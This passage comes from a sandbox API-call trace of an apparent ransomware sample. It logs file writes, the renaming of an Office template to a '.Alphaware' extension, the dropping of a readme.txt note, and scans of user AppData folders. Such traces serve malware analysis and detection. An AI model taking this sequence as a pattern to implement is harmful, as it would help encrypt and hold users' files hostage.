lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.865] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.865] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.865] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.865] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.866] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.866] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.866] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e738) returned 1 [0092.907] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), fInfoLevelId=0x0, lpFileInformation=0x23ea60 | out: lpFileInformation=0x23ea60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89935d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2214e5)) returned 1 [0092.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6e8) returned 1 [0092.908] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx.alphaware")) returned 1 [0092.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7c8) returned 1 [0092.909] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e738) returned 1 [0092.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0092.911] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\*"), lpFindFileData=0x23e760 | out: lpFindFileData=0x23e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x89935d60, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89935d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x89935d60, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89935d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89935d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2214e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx.Alphaware", cAlternateFileName="BUILT-~1.ALP")) returned 1 [0092.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89935d60, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x89935d60, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89935d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0092.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89935d60, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x89935d60, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89935d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0092.911] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0092.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0092.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.911] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\excel\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0092.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0092.912] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.913] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\excel\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0092.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.913] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.914] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\excel\\xlstart\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.916] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.916] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0092.916] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.917] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\excel\\xlstart\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.917] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.917] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0092.917] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.917] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.918] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.918] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0092.918] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0092.918] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.918] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\*"), lpFindFileData=0x23e8a0 | out: lpFindFileData=0x23e8a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.918] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.919] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0092.919] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.919] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.919] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0092.919] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.919] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.919] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d24b360, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x5a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0092.920] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5021c250, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5021c250, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x502423b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0092.920] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0092.920] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0092.920] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, 